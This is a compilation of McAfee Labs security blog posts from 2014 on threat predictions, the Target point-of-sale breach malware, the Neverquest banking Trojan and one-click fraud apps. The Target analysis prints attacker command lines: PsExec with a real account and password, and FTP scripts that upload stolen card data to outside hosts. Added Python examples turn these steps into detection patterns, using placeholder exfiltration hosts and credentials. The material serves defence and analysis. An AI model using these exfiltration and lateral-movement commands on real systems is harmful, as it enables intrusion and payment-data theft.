2014 Threats Predictions: The Internet of Things Offers Handy Gadget Control, Yet Could Unlock More Than We Expect

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Toralv Dirro, Aditya Kapoor, and Cedric Cochin.

Many people are looking forward to the Internet of Things and how this trend can make our lives easier and more automated. But many don’t know what this means or how it already impacts us today. The idea behind the Internet of Things is that if people and many common objects in our daily lives were equipped with unique identifiers, then our computers could efficiently automate and manage these objects. Today there are many definitions, but central to all is the management of resources by computers, including mobile devices. To achieve this, these resources must be interconnected. And this is where we can see both benefits—and possible problems—for our lives.

Lots of devices already offer an intranet or Internet connection to make our dealings with them easier; just look at the average new television. Of course it works just fine connected to your cable, satellite, or aerial service. Now add a Blu-ray player and some TVs will automatically exchange information, adopt configurations, etc. For instance, the Anynet+ protocol will link your TV via a network cable or WiFi stick and download content from the Internet, while updating itself with the latest version. These are useful features, but they come with a risk. We have seen that attackers can exploit vulnerabilities in the set (basically it’s just a computer, running an OS and apps) to take over the TV and, for example, activate a built-in webcam. There are even alternate operating systems for some TV sets. If an attacker could take over a TV somewhere in a corporate network and use it to stage attacks on other machines, how would we ever suspect the TV could be the weak link? If this isn’t already happening as part of advanced attacks, we suspect it will occur in the coming year.

Vulnerabilities in Things extend much further than television. The European standard Meter-Bus (or M-Bus) was designed for the remote reading of gas and electric meters. Recently its radio variant, Wireless M-Bus, has gained a lot of popularity. The wireless aspect allows the remote management of lights, heating, electricity, alarm systems, and much more from a central unit using a special protocol. These systems have become affordable for home use and allow the owners to control appliances and other home services via smartphones and tablets over standard WiFi. Soon some houses will do away with keys to unlock doors and replace them with locks that use near-field communications or Bluetooth to identify the owners simply by their smartphones. Some Internet-connected locks will allow the remote locking and unlocking of homes, handy for letting in the house cleaner or the kids after school. What could possibly go wrong? For starters, if attackers can crack your home WiFi, they might easily open the doors to robbery attempts, without having to break in and attract undue attention.

The Internet of Things is still in its early stages. Yet we can foresee even more serious threats. Electric cars can now store and return electricity to the power grid. To do this, they will be connected to the home network and a smart meter, making remote attacks against a car and its systems (disabling brakes, etc.) much more feasible. We can also imagine potentially lethal remote attacks against medical devices such as insulin pumps. And these concerns don’t begin to touch the potential problems of various household or office devices updated by the “backdoor,” for good or ill, by their manufacturers.

In the coming years, having your ID stolen after a criminal compromises your home computer may seem a minor problem. Your security concerns will have to expand beyond traditional computing devices to make sure all networked objects are regularly updated and that you employ secure passwords.

2014 Threats Predictions: Advanced Threats, Techniques Challenge the Best of Defenses

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Craig Schmugar, Ryan Sherstobitoff, and Klaus Majewski.

Advanced threats

End users have more computing choices than ever before, from phones to tablets, desktops to laptops, but servers are a common hub for all these devices. Servers are also critical assets for corporations, governments, and even social circles. If attackers can penetrate these common cores of communication, they can reach many users’ systems and their data. Exploitation may come via a poorly configured system, weak credentials, or service or application vulnerabilities. Once a foothold has been established, criminals can use further advanced tactics to conceal their tracks and evade many forensics analysis techniques. In the year ahead we anticipate a heightened focus on this avenue of attack.

Traditional malware installs on a victim’s machine to allow it to execute each time the system boots. Rootkits subvert the operating system to conceal and/or resist the detection and removal of the threat. Next year we will see a shift away from this model in several ways.

  • Self-deleting malware will cover its tracks by removing all traces of payload files from the operating system, leaving code to execute in memory. Most of the time this is sufficient for a threat to do its damage, whether stealing user credentials, encrypting data files, or a host of other nefarious activity.
  • Memory-only attacks don’t need initial executable code to hit the disk, but rather exploit applications already running to perform the same types of functions.

These two methods may be fueled by the increasing popularity of Connected Standby hardware and software, namely Intel Haswell processors and Windows 8, which encourage users to shut down their systems less often due to power consumption optimizations. Plus, servers are rarely rebooted, making them a prime target for such techniques. We anticipate an increase in two further threats:

  • Using “off-box” persistence, attackers can maintain a stronghold on a victim’s machine without leaving traces for traditional file antivirus products to discover.
  • Parasitic Trojans infect an existing host file, which is more likely to remain unnoticed.

Advanced persistent threats burrow into government or organizational networks and remain dormant, sometimes stealing data but also waiting for the right moment to attack. In 2014 these attacks will become more targeted in nature and will focus more on individuals to gain access to networks. We will also see the weaponization of malware and an increase in destructive cyberterrorism and government-on-government cyberwarfare. Adversaries will use a number of evasion techniques to become more effective in penetrating their targets with a mix of zero-day vulnerabilities customized to their victims’ environments. We will see greater innovation used by attackers as the security industry reveals their techniques and tactics.

Advanced evasion techniques

Cyberattackers use various evasion techniques to manipulate network traffic so that network defenses such as firewalls, intrusion prevention systems, and breach detection systems do not detect exploits that are part of the traffic. The technique was in play by 1998, and evasions still work extremely well. From a hacker’s point of view, an evasion is a transport mechanism that can silently pass any kind of exploit through a network’s defenses without raising an alarm. Advanced evasion techniques combine single evasions into complex combinations. We have discovered more than 450 single evasions, and the number of combinations is at least as high as there are different kinds of computer viruses in the world.

Advanced evasion techniques are one of the biggest unsolved problems in the network security industry. Customers and vendors downplay their importance because they either do not believe in them or they do not have a way to remediate them. (To learn more about AETs, download McAfee Evader, an automated evasion testing tool, and read the report that SANS did with the Evader.)

We predict that in 2014 hackers will use advanced evasions especially to exploit old vulnerabilities. How is that possible? Haven’t old vulnerabilities been patched? They have been by most consumers and organizations that use automatic or regularly scheduled updates, but we still find old machines that cannot be patched in industrial control systems and factory environments. Many of these control systems can be patched only once a year during an annual maintenance break; others run operating systems so old, such as Windows NT, that there are no more patches for them. Security administrators routinely use network protection devices to shield those systems against exploits, but advanced evasion techniques silently bypass those devices. Industrial control systems are used in all manufacturing sites, in energy production, and in critical infrastructure. We expect to see more activity against these sites in the coming year.

2014 Threats Predictions: Network and Host Attacks Will Again Target Adobe and Microsoft Apps, Java

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Bing Sun, with assistance from Andy Cheng, Yingwu Han, Haifei Li, Qiang Liu, Shennan Wang, Jun Xie, Chong Xu, and Stanley Zhu.

Our research into threats to networks and applications shows us three top targets of malware developers. They aim zero-day and advanced persistent threat attacks against vulnerabilities in Microsoft Internet Explorer (including IE plug-ins and ActiveX), Adobe applications (including PDF and Flash), and Sun’s Java. We also see vulnerabilities in Microsoft Office applications and other Windows native components (such as GDI+, the kernel module, and drivers) exploited in the wild. These targets are favorites each year for attackers, so it’s not hard to predict where they will look in 2014.

  • Browsers will remain the primary target for remote code execution attacks. Browsers have a range of factors that can be leveraged for exploitation, such as third-party plug-ins and various scripting-language support.
  • The prevalence of vulnerabilities in Adobe applications will increase, perhaps related to source-code leakage. Adobe product vulnerabilities, especially in Flash, are often used in conjunction with other application vulnerabilities (in browsers, Office, etc.) to bypass protections.
  • Java vulnerabilities and exploits, either of the Java virtual machine or native component layer, will remain very popular. Compared with memory corruption issues, Java exploits don’t require a shellcode-like payload; thus they are more reliable and easier to make. Although Java enhanced its security in Version 7.0—a security alert will prompt users before running any unsigned applet, for example—many users will choose to disable the alert to avoid the noise. Moreover, we suspect many Java users still use old or unsupported versions due to compatibility issues with legacy Java apps or simply bad habits. This would explain why so many old Java vulnerabilities are still actively exploited by exploit kits.
  • Attackers will continue to find holes in Office. Our analysis of the recent Office exploit CVE-2013-3906 (TIFF embedded in .docx) reminded us that Office documents employ a compound-document format that is designed to allow many other types of content (such as OLE objects). Such a rich set of features, some perhaps unknown or hidden, will inspire attackers to find new weaknesses in these applications. From this exploit, we know that a Word document can embed a number of ActiveX binaries to do heap sprays, and can load an incompatible module (VB6) to completely disable data execution prevention for the entire process.
  • Kernel-mode elevation of privilege vulnerabilities will be widely exploited in combination with other application vulnerabilities to achieve both temporary and persistent infections. As we see in Microsoft’s Patch Tuesday security bulletin data, there are often new patches for kernel-mode vulnerabilities, notably in the GUI subsystem (win32k.sys). Kernel-mode issues accounted for roughly one-quarter of all Microsoft product vulnerabilities in 2013. Considering the complexity of kernel-mode components, we can foresee that the number of kernel vulnerabilities of 2014 will be at least as high as in 2013.

To add to our worries, exploits have become more advanced in their reliability, persistence, and ability to bypass various protections. Further predictions:

  • Native operating system and application protection mechanisms are not adequate to detect and stop advanced exploits. Attackers will increase their efforts to break these defenses in 2014. Although both OS and application vendors have made many security improvements, attackers can always find new ways to create reliable exploits, which was well demonstrated in the 2013 Pwn2Own hacker contest. For example, the combination of data execution prevention and address space layout randomization can be easily defeated by memory information leaks and return-oriented programming.
  • Many exploits are now aware of the existence of network and endpoint security software. As we have observed during our research, the trick of API hook hopping has become a standard weapon of advanced shellcode to prevent its execution from being monitored. We have seen this technique in wide use, especially in zero-day exploits. We expect exploit tools such as Metasploit Framework and Canvas may soon add this feature.
  • Many applications have implemented “sandbox” solutions to confine malicious behaviors in a restricted environment to minimize their impact. Office, Adobe Reader, and Google Chrome each have a sandbox implementation. To break out of an application-level sandbox and do malicious things to a whole system, an attacker will have to use more than one vulnerability and achieve a multistage exploitation. An elevation of privilege vulnerability can help an attacker escape from the sandbox and install malware on the compromised system. Here’s where a kernel-mode vulnerability will come in handy because it can let an attacker run code in Ring 0. We expect more attackers to take advantage of kernel exploits to escape application-level sandbox products.
  • We believe exploits (especially zero day and advanced persistent threats) will soon evolve to include features that defeat sandboxing. First, exploits will become stealthier, especially during the postexploitation stage. They will try to leave as few footprints as possible because sandbox detection relies heavily on postinfection behaviors to identify an attack. Further, more exploits will begin to detect or even escape from a sandbox. Although the latter seems difficult, it is possible.

2014 Threats Predictions: Botnets, Spam Explore New Avenues to Steal Data, Money

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Adam Wosotowsky.

Botnets

Botnets come and botnets go, but we can be certain they will continue to plague us in the coming year. Botnets that send spam are again on the rise; spam volume in 2013 increased to levels we had not seen since 2010.

Support for Windows XP ends in April, so it would be natural for attackers to target this OS even more because Windows XP’s market share is likely to remain high for a while. We are also likely to see more zero-day attacks targeting vulnerabilities in XP to establish bot clients for sending spam or other uses.

Botnets will take part in more targeted attacks. We have already seen espionage supported by Travnet, which targeted governments of various countries. Next year we’ll see botnets used as a platform to launch attacks on industry-specific infrastructure such as medical devices, SCADA manufacturing systems, military organizations, smart chips, ATMs, banking, etc.

The biggest attraction of botnets—making money—will likely lead to an increase in interest in digital/virtual currencies such as Bitcoin mining. “Botnets as a service” will extend to areas in addition to their use in spamming, denials of service, and so on.

This year we observed a lot of botnet and Trojan (for example, Carberp and KINS/PowerZeus) source code leaked in public forums. We expect to see more and more variants of current botnets as attackers modify today’s source code to create and sell their own bot kits.

There will also be an increase in the sophistication of botnets. We are likely to see several developments:

  • Advanced cryptography and custom encryption in communications with control servers
  • Code obfuscations to prevent detection and reverse engineering
  • Hardware-locked malware that runs only on a specific system after infection
  • Sandbox/environment awareness that prevents the creation of automated antimalware signatures

With the smartphone and tablet markets increasing at a rapid rate and more organizations adopting “bring your own device” policies, we are likely to see the emergence of mobile-based botnets. Further, we expect more JavaScript Blacole-related campaigns affecting mobile apps.

Spam

We have recorded large growth in affiliate-marketing spam during the past few years. With this type, spammers send unsolicited advertising from legitimate companies to purchased email lists of customers who have not opted in to receiving the advertising yet are not capable of opting out. According to the CAN-SPAM Act, this sort of behavior leaves both the marketer and the client company liable for these spam activities, and the unrelenting nature of these campaigns often leads to the publicizing of companies using these sorts of marketers to force them to stop. We still need more international cooperation to get countries to agree on a basic definition of spam and adopt best practices for handling entities that send unsolicited email to purchased lists.

“Snowshoe” spamming, which uses many IP addresses to send as much spam as possible before the addresses are blacklisted, for the most part in 2013 targeted common two-letter top-level domains such as .us, .in, and .uk. This year we may see other two-letter TLDs such as .la (Laos) and .me (Montenegro, for foreign-language mails) as prime targets. Some, such as .la, are already promoting casino spam. Overall we could see more two-letter TLDs used in spam mails.

Penny stocks, loan offers, and “pump ’n’ dump” spam enjoyed a resurgence in 2013 after disappearing for a few years. As the stock market euphoria continues, small investors will be vulnerable to this type of scam. In past years these sorts of email campaigns stayed around until the perpetrators were arrested, which is likely to be the case again.

With the means for monetizing botnets growing more diverse, we expect to see an increase in spam coming from web servers compromised through PHP/MySQL remote exploits. Today we find mostly pill spam (pharmacy offers) generated through these attacks. Each year the number of web pages that haven’t been maintained with up-to-date libraries increases, which offers a growing number of sources for delivering spam, phishing, and malware to victims.

2014 Threats Predictions: HTML5, Exploit Kits, ‘Free’ Software Require Web Safeguards

This post is one in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Christoph Alme, Paula Greve, and François Paget.

In spite of advanced attacks of various types, malware, and other concerns, the web remains the primary threat vector. Whether we browse via Android, iOS, Windows, Mac, or other means, free open-source analytic tools can allow almost anyone to learn too much about us and use that information to entice us to “click that link.” We have learned to avoid many of these temptations, but two things remain true in security: As features evolve, new threats are quick to arise; and as we adapt detection and takedown capabilities, the bad guys are just as agile in adapting their methods. We anticipate an increase in threats next year in three main areas: HTML5, exploit kits, and “free” software.

The biggest story in feature evolution is HTML5, which allows websites to come alive with interaction, personalization, and rich capabilities for programmers. But HTML5 also allows a significant number of new ways to snoop on users and exploit the system. Using HTML5, researchers have already shown how one could identify a user’s browser history to better target ads. Once the HTML5 adoption is complete, we expect to see similar abuses of HTML5 to enable access to the device—breaching the browser sandbox. With the spread of “app friendly” devices—and HTML5 embedded not just in web pages but within the apps as well—hackers will gain as much access to a user’s world as they could desire. We expect HTML5 abuses to become as commonplace as any of the exploit kits will allow.

Speaking of exploit kits, this past year showed us that they are the best tool for infecting users’ machines. We expect that the bad guys will continue to invest in the development and sharing of kits such as Blackhole. As the security industry continues to better detect and respond to newly registered domains set up for a malicious purpose, the criminals will focus efforts on evolving exploit kits to successfully insert malicious code and redirection components into legitimate web sites. Given the dynamic nature of content hosting, short URLs, and dynamic page content, these infected pages may have a longer time to live and become more valuable to attackers. Thus we will see continued evolution of attacking not only the browsers, but the servers as well.

In 2014, users and administrators will face a greater challenge from “free” products. Some say if you don’t pay for a product, you are the product. We have become accustomed to getting awesome apps—for free—with excellent features that make our lives easier—for free—and even security services—for free. But all of these services and apps cost money, and their developers must pay for them by selling ads, selling our information, or making us buy other things. This need has led to significant shades of gray between “information-stealing malware” and “making-our-lives-easier utilities.” In the security industry, we already see increased pressure from developers to reclassify their potentially unwanted programs and adware as legitimate software. During the course of 2014, an event (data breach, data leak, a company using customer information just a little too broadly) will occur that will make the public fully aware of how much of their data is exposed and could be inferred. This event and its fallout will challenge some of the freemium models that society has come to expect, and will wake up the general public to how much of a “right” they have to fully understand and control their “big data footprint” and what conveniences they would be willing to give up to make it smaller.

Our desire for more and better features exposes us to greater risks, more open-source options help not just developers and researchers but also cybercriminals, and convenience and cost battle with privacy and security. In 2014 we will see the full impact of these tradeoffs.

Analyzing the Target Point-of-Sale Malware

In the last 24 hours, McAfee Labs has started to piece together more and more detail on the malware that is apparently tied to the campaign against Target. To recap, in November 2013 the retailer was compromised via undisclosed methods. The attackers were able to plant point-of-sale malware and intercept approximately 110,000,000 records worth of payments, transactions, and other personally identifiable data. Working backward, we can start to see evidence of the activity in December (prior to the story’s breaking) based on underground chatter, VirusTotal submissions, and other open-source intelligence sources.

Although there is no official confirmation, we have credible evidence to indicate that the malware used in the Target stores attack is related to existing malware kits sold in underground forums. Related samples to date are somewhat similar in function to (and possibly derived from) known “BlackPOS” samples.

Sample Information/Sources

  • ce0296e2d77ec3bb112e270fc260f274–ThreatExpert (cache)
  • F45F8DF2F476910EE8502851F84D1A6E–ThreatExpert (cache)
  • 7f1e4548790e7d93611769439a8b39f2–VirusTotal
  • 4d445b11f9cc3334a4925a7ae5ebb2b7–VirusTotal
  • 762ddb31c0a10a54f38c82efa0d0a014–VirusTotal
  • c0c9c5e1f5a9c7a3a5043ad9c0afa5fd–VirusTotal

7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 are uploaders that reveal many useful details about data collection, data transfer, and possibly the actor behind the campaign.

Possible Actor/Attribution Data

Both uploaders contain the following string (compile path):

  • z:\Projects\Rescator\uploader\Debug\scheck.pdb

Rescator is a known actor in various cybercrime forums:

[Screenshot: cybercrime forum]

Data Collection and Transfer

Data is collected and transferred to internal shares via the following command syntax:

  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p backupu$r cmd /c "taskkill /im bladelogic.exe /f"
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c psexec /accepteula \\10.116.240.31 -u ttcopscli3acs\best1_user -p backupu$r -d bladelogic
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c move \\10.116.240.31\nt\twain_32a.dll c:\program files\xxxxx\xxxxx\temp\data_2014_1_16_15_30.txt
  • c:\windows\system32\cmd.exe, c:\windows\system32\cmd.exe /c ftp -s:c:\program files\xxxxx\xxxxx\temp\cmd.txt

“ttcopscli3acs” is reportedly a Windows domain name used within Target stores.

7f1e4548790e7d93611769439a8b39f2 and 4d445b11f9cc3334a4925a7ae5ebb2b7 drop the following script upon execution:

——————————————
open xxx.xxx.xxx.xx
%name%
%password%
cd public_html
cd cgi-bin
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_%_%_%%_%%.txt
quit
——————————————

Similar scripts are present in 762ddb31c0a10a54f38c82efa0d0a014 and c0c9c5e1f5a9c7a3a5043ad9c0afa5fd.

——————————————
open xx.xxx.xxx.xx
%name%
%password%
cd 001
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt
quit
——————————————

——————————————
open xx.xx.xxx.xx
%name%
%password%
cd etc
bin
send C:\Program Files\xxxxxx \xxxxxxxx\Temp\data_2014_data_2014_%_%_%%_%%.txt
quit
——————————————
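As an added illustration (not code from the original post or from McAfee), the following Python checks process-creation log lines for the four steps of the collection-and-transfer chain shown above (PsExec with embedded credentials, killing the monitoring agent, staging a file from an admin share into a temp folder, and a scripted `ftp -s:` upload) and parses a dropped FTP script to recover the drop site. The log lines, the 10.0.0.5 share, the account, the password, the paths and the FTP host 203.0.113.10 are constructed placeholders, not indicators from the incident.

```python
import re
from dataclasses import dataclass, field

# Constructed process-creation log lines modelled on the command syntax in the
# post above. Host names, the 10.0.0.5 share, account, password and paths are
# placeholders, not the indicators from the incident.
SAMPLE_PROCESS_LOG = [
    r'2014-01-16 15:29:58 host=POS-REG-07 cmd=c:\windows\system32\cmd.exe /c psexec /accepteula \\10.0.0.5 -u CORP\svc_backup -p Pa55w0rd cmd /c "taskkill /im bladelogic.exe /f"',
    r'2014-01-16 15:30:02 host=POS-REG-07 cmd=c:\windows\system32\cmd.exe /c move \\10.0.0.5\nt\twain_32a.dll c:\program files\app\temp\data_2014_1_16_15_30.txt',
    r'2014-01-16 15:30:05 host=POS-REG-07 cmd=c:\windows\system32\cmd.exe /c ftp -s:c:\program files\app\temp\cmd.txt',
    r'2014-01-16 15:31:10 host=WS-044 cmd=c:\windows\system32\notepad.exe c:\users\jane\notes.txt',
]

# Constructed FTP script in the shape of the ones dropped by the uploaders;
# 203.0.113.10 is a documentation address and the credentials are invented.
SAMPLE_FTP_SCRIPT = """open 203.0.113.10
uploaduser
s3cret
cd public_html
cd cgi-bin
bin
send C:\\Program Files\\app\\Temp\\data_2014_1_16_15_30.txt
quit
"""

# Each rule covers one observable step of the collection/transfer chain.
RULES = [
    ("psexec_with_embedded_credentials",
     re.compile(r"psexec\b.*\s-u\s+\S+\s+-p\s+\S+", re.I)),
    ("psexec_kills_monitoring_agent",
     re.compile(r"psexec\b.*taskkill\s+/im\s+\S+\s+/f", re.I)),
    ("staging_from_admin_share",
     re.compile(r"\bmove\s+\\\\[^\s\\]+\\\S+\s+.*\\temp\\data_\d{4}_", re.I)),
    ("scripted_ftp_transfer",
     re.compile(r"\bftp\s+-s:", re.I)),
]


def scan_process_log(lines):
    """Return one finding per (line, rule) hit, in log order."""
    findings = []
    for idx, line in enumerate(lines):
        for name, pattern in RULES:
            if pattern.search(line):
                findings.append({"line": idx, "rule": name})
    return findings


@dataclass
class FtpScript:
    host: str = ""
    user: str = ""
    password: str = ""
    remote_dirs: list = field(default_factory=list)
    binary: bool = False
    files_sent: list = field(default_factory=list)


FTP_VERBS = {"open", "cd", "bin", "binary", "ascii", "send", "put", "mput",
             "lcd", "prompt", "quit", "bye"}


def parse_ftp_script(text):
    """Parse an 'ftp -s:' script. ftp.exe feeds bare lines after 'open' to the
    login prompts, so the first two non-command lines are user and password."""
    script = FtpScript()
    creds = []
    for raw in text.splitlines():
        line = raw.strip()
        if not line or line.startswith("\u2014"):  # skip blanks and separators
            continue
        verb, _, arg = line.partition(" ")
        verb = verb.lower()
        if verb == "open":
            script.host = arg.strip()
        elif verb not in FTP_VERBS:
            creds.append(line)
        elif verb == "cd":
            script.remote_dirs.append(arg.strip())
        elif verb in ("bin", "binary"):
            script.binary = True
        elif verb in ("send", "put", "mput"):
            script.files_sent.append(arg.strip())
        elif verb in ("quit", "bye"):
            break
    script.user, script.password = (creds + ["", ""])[:2]
    return script


def exfil_destination(script):
    """Reconstruct the drop location as an ftp:// URL for blocking/notification."""
    return "ftp://" + script.host + "/" + "/".join(script.remote_dirs)


if __name__ == "__main__":
    for hit in scan_process_log(SAMPLE_PROCESS_LOG):
        print(f"line {hit['line']}: {hit['rule']}")
    parsed = parse_ftp_script(SAMPLE_FTP_SCRIPT)
    print("drop site:", exfil_destination(parsed), "files:", parsed.files_sent)
```

The `%name%`/`%password%` placeholders in the real scripts are handled the same way as literal credentials, since they occupy the login-prompt positions.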

Compilation Dates

  • 762ddb31c0a10a54f38c82efa0d0a014 – Sat Nov 30 17:52:00 2013 UTC
  • 4d445b11f9cc3334a4925a7ae5ebb2b7 – Sat Nov 30 17:21:17 2013 UTC
  • c0c9c5e1f5a9c7a3a5043ad9c0afa5fd – Tue Dec  3 00:15:01 2013 UTC
  • 7f1e4548790e7d93611769439a8b39f2 – Sat Nov 30 17:38:23 2013 UTC

2014 Threats Predictions: Malware to Take Advantage of Hotspots, Gaming Consoles

This post is the last in a series of articles that expand on the recently released McAfee Labs 2014 Threats Predictions. In this and related posts, McAfee Labs researchers offer their views of new and evolving threats we expect to see in the coming year. This article was written by Craig Schmugar.

Renewed interest in small-office and home-office router hacking, and an uptick in successful exploitations will lead to an increase in WiFi hotspot–related threats. This threat vector will lead to more cross-platform attacks. Public access points are especially worrisome because any system on the network can be impacted by an infected computer that had previously connected to the same hotspot.

With the increasing versatility of Internet-connected gaming consoles, the chances of randomly downloading malware while browsing or installing an app are also increasing. Fueled by the releases of the Microsoft Xbox One and Sony PlayStation 4 in 2013, we expect to see attacks on these platforms grow in proportion with their adoption.

Neverquest Banking Trojan Uses VNC, SOCKS in New Threat

A new banking Trojan in the news, known as Neverquest, is active and being used to attack a number of popular banking websites. This Trojan can identify target sites by searching for specific keywords on web pages that victims are browsing. After infecting a system, the malware gives an attacker control of the infected machine with the help of Virtual Network Computing (VNC, for remote access) and a SOCKS proxy server. The Trojan targets several banking sites and steals sensitive information such as login credentials that customers enter into these websites. The Trojan also steals login information related to social networking sites (listed in the configuration file) like Twitter, and sends this information to its control server.

Once it infects a system, the Trojan drops a random-name DLL (for example, cjekvxk.dat) with a .dat extension in the %APPDATA% folder. The Trojan then automatically runs this DLL using regsvr32.exe /s [DLL PATH] by adding a key under “Software\Microsoft\Windows\CurrentVersion\Run\.” The Trojan tries to inject its malicious code into running processes and waits for browser processes such as iexplorer.exe or firefox.exe. Once the victim opens any site with these browsers, the Trojan requests the encrypted configuration file from its control server, as we see in this screenshot:

[Screenshot: neverquest_config_request]
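An added example, not part of the original post: a Python triage check for Run-key values that match the persistence step described above (regsvr32.exe /s registering a randomly named non-DLL file from %APPDATA% at every logon). The sample Run values, value names and paths are constructed; the scoring threshold is an assumption.

```python
import ntpath
import re

# Constructed HKCU\...\CurrentVersion\Run values (value name -> command line).
# Only the first mimics the pattern described above; names and paths are invented.
SAMPLE_RUN_VALUES = {
    "cjekvxk": r"regsvr32.exe /s C:\Users\jane\AppData\Roaming\cjekvxk.dat",
    "OneDrive": r'"C:\Users\jane\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background',
    "VendorCodec": r'C:\Windows\System32\regsvr32.exe /s "C:\Program Files\Vendor\codec.dll"',
}

# Locations a low-privileged process can write to; a COM server registered
# from one of these at every logon deserves a look.
USER_WRITABLE = ("\\appdata\\", "\\temp\\", "\\users\\public\\", "\\programdata\\")


def split_command(command):
    """Split a Windows command line, keeping double-quoted arguments whole."""
    return [t.strip('"') for t in re.findall(r'"[^"]*"|\S+', command)]


def classify_run_value(command):
    """Return the reasons a Run value resembles the loader above (empty = none)."""
    tokens = split_command(command)
    if not tokens or ntpath.basename(tokens[0]).lower() != "regsvr32.exe":
        return []
    switches = {t.lower() for t in tokens[1:] if t.startswith("/")}
    # Unquoted paths with spaces arrive as several tokens; rejoin them.
    target = " ".join(t for t in tokens[1:] if not t.startswith("/"))
    reasons = ["regsvr32 launched from Run key"]
    if "/s" in switches:
        reasons.append("silent registration (/s)")
    ext = ntpath.splitext(target)[1].lower()
    if ext and ext != ".dll":
        reasons.append(f"non-DLL target extension {ext}")
    if any(marker in target.lower() for marker in USER_WRITABLE):
        reasons.append("target in user-writable location")
    return reasons


def suspicious_run_entries(values, min_reasons=3):
    """Map value name -> reasons for entries that reach the (assumed) threshold."""
    flagged = {}
    for name, command in values.items():
        reasons = classify_run_value(command)
        if len(reasons) >= min_reasons:
            flagged[name] = reasons
    return flagged


if __name__ == "__main__":
    for name, reasons in suspicious_run_entries(SAMPLE_RUN_VALUES).items():
        print(name, "->", "; ".join(reasons))
```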

The Trojan generates a unique ID number that will be used in subsequent requests. The reply is compressed with aPLib: the compressed data follows an “AP32” header and is passed to a decompression routine, as shown:

[Screenshot: neverquest_config_decode]

The configuration file contains a huge amount of JavaScript code, a number of bank websites, social networking websites, and a list of financial keywords. The JavaScript code in the configuration file is used to modify the page contents of the bank’s site to steal sensitive information. Let’s look at the configuration file:

[Screenshot: neverquest_config_code]

The Trojan targets financial institutions including Bank of America, CitiBank, and many others. Here is a list of target sites found in the decrypted configuration file:

[Screenshot: neverquest_bank_list]

The Trojan asks for sensitive information by modifying the page contents that a victim visits. The configuration file also contains a list of social networking sites and a list of keywords related to banking:

[Screenshot: neverquest_keywords]

If the Trojan finds any of the keywords on a web page, it will steal the full URL and all user-entered information and send this data to the attacker:

[Screenshot: neverquest_steal_pass]

The Trojan sends a unique ID number followed by the full URL containing username and password. (We’ve entered fake information to capture the logs.) The Trojan also sends all web page contents compressed with aPLib to the attacker in the following format:

[Screenshot: neverquest_webpage_steal]

The Trojan steals information entered on social networking sites listed in the configuration file and can use that data to further spread the malicious code:

[Screenshot: neverquest_twitter_pass]

The Trojan continually steals new data and updates its configuration file. The attacker uses SOCKS and VNC servers on the infected machine to carry out further malicious activity. Here is a snapshot of the strings we found:

[Screenshot: neverquest_vncsocks]

The Trojan can steal SMTP (Simple Mail Transfer Protocol) and POP (Post Office Protocol) credentials from email clients. It can also steal FTP login credentials from various programs; those credentials can then be used to distribute the malicious code:

[Screenshot: neverquest_list_ftp]

We have also found an updated configuration file that requests additional JavaScript files from a different malicious server, targeting financial sites such as BMO (Bank of Montreal), PayPal, RBC (Royal Bank of Canada), and others. That server hosts several web panels for collecting sensitive information from different financial sites, which shows the attackers are learning and creating fake pages for new targets. The JavaScript code:

[Screenshot: neverquest_rbc_webpanel]

The preceding JavaScript is displayed in the victim's browser when visiting these sites. There are many banking Trojans, but Neverquest has more capabilities than most. With the proxy and remote-control components, attackers can hide their tracks and carry out transactions from the infected machines themselves. The Trojan can discover new banking sites using the financial keywords in its configuration file, and it steals new banking URLs and their page contents, which eventually update the configuration. In this way Neverquest grows its target database for future attacks.

I would like to thank my colleague Vikas Taneja for assistance with this research.

The post Neverquest Banking Trojan Uses VNC, SOCKS in New Threat appeared first on McAfee.


One-Click Scammers Still Targeting Japanese Smartphone Users


Last year we saw an attack targeting Android device users in which more than 2,400 malicious one-click fraud apps were published on Google Play in Japan. The attack has calmed down since October 2013, but it seems the scammers are still looking for opportunities to victimize smart device users in Japan.

As we enter 2014, McAfee has again discovered suspicious apps on Google Play in Japan that lead users to malicious one-click-fraud websites. Ten apps have been published under one developer's account, with at least 5,000 downloads in total as of this writing.

Figure 1: Suspicious apps lead users to malicious one-click fraud sites.

Unlike many of the apps discovered last year, which simply displayed fraudulent websites, these new apps look harmless and behave like adult image viewers. However, after installation they register for push notifications from the attacker's server via GCM (Google Cloud Messaging). The attacker can at any time push a message containing a URL to a one-click-fraud site; when the user taps the message in the system notification bar, the browser opens the risky site.

Figure 2: The apps are implemented as adult image viewers.

Figure 3: Push notification messages that lead users to a malicious one-click-fraud site.

The notification is pushed once or twice per day, and the destination URLs include not only one-click-fraud sites but also fraudulent adult dating sites. Because the notification appears even when the app is not running, and its origin is deliberately hidden, it can confuse users and expose them to risk.

McAfee reported Android/BadPush.A last year; that malware also leads users to fraudulent adult dating services using push notification messages.

McAfee Mobile Security detects these newly found apps as Android/BadPush.B.

Tricking users into visiting one-click-fraud sites is not limited to Android apps on Google Play. Android adult apps on unofficial websites can also do this.

Figure 4: Examples of unofficial apps that lead users to one-click-fraud sites.

We have also confirmed that the scammers are tricking users on many Japanese blogs related to adult content, as well as on Twitter, LINE, Kakao Talk, and others. Because these attacks are web-based, iOS users as well as Android users should be careful.

Figure 5: Tweets that lead users to one-click-fraud sites.

Figure 6: A LINE message that leads users to one-click-fraud sites.

